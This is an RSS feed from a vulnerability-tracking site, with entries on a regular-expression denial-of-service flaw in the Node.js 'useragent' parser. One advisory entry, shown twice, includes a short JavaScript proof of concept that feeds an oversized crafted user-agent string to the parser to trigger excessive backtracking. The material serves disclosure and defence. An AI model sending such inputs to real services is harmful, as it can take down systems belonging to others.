<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Fri, 09 Oct 2026 12:17:03 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-198064</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-198064</link>
      <description>EUVD-2026-198064</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-198064</guid>
    </item>
    <item>
      <title>fkie_cve-2020-26311</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2020-26311</link>
      <description>&lt;p&gt;Useragent is a user agent parser for Node.js. All versions as of time of publication contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS). As of time of publication, no patches are available.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Useragent is a user agent parser for Node.js. All versions as of time of publication contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS). As of time of publication, no patches are available.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2020-26311</guid>
    </item>
    <item>
      <title>GHSA-mgfv-m47x-4wqp — useragent Regular Expression Denial of Service vulnerability</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-mgfv-m47x-4wqp</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: useragent&lt;/p&gt;
&lt;p&gt;Useragent is a user agent parser for Node.js. All versions as of time of publication contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS).&lt;/p&gt;
&lt;p&gt;## PoC
```js
async function exploit() {
   const useragent = require(\&amp;#34;useragent\&amp;#34;);&lt;/p&gt;
&lt;p&gt;// Create a malicious user-agent that leads to excessive backtracking
   const maliciousUserAgent = &amp;#39;Mozilla/5.0 (&amp;#39; + &amp;#39;X&amp;#39;.repeat(30000) + &amp;#39;) Gecko/20100101 Firefox/77.0&amp;#39;;&lt;/p&gt;
&lt;p&gt;// Parse the malicious user-agent
   const agent = useragent.parse(maliciousUserAgent);&lt;/p&gt;
&lt;p&gt;// Call the toString method to trigger the vulnerability
   const result = await agent.device.toString();
   console.log(result);
}&lt;/p&gt;
&lt;p&gt;await exploit();
```&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: useragent&lt;/p&gt;
&lt;p&gt;Useragent is a user agent parser for Node.js. All versions as of time of publication contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS).&lt;/p&gt;
&lt;p&gt;## PoC
```js
async function exploit() {
   const useragent = require(\&amp;#34;useragent\&amp;#34;);&lt;/p&gt;
&lt;p&gt;// Create a malicious user-agent that leads to excessive backtracking
   const maliciousUserAgent = &amp;#39;Mozilla/5.0 (&amp;#39; + &amp;#39;X&amp;#39;.repeat(30000) + &amp;#39;) Gecko/20100101 Firefox/77.0&amp;#39;;&lt;/p&gt;
&lt;p&gt;// Parse the malicious user-agent
   const agent = useragent.parse(maliciousUserAgent);&lt;/p&gt;
&lt;p&gt;// Call the toString method to trigger the vulnerability
   const result = await agent.device.toString();
   console.log(result);
}&lt;/p&gt;
&lt;p&gt;await exploit();
```&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-mgfv-m47x-4wqp</guid>
    </item>
    <item>
      <title>gsd-2020-26311</title>
      <link>https://cve.radiocsirt.org/vuln/gsd-2020-26311</link>
      <description>gsd-2020-26311</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/gsd-2020-26311</guid>
    </item>
  </channel>
</rss>
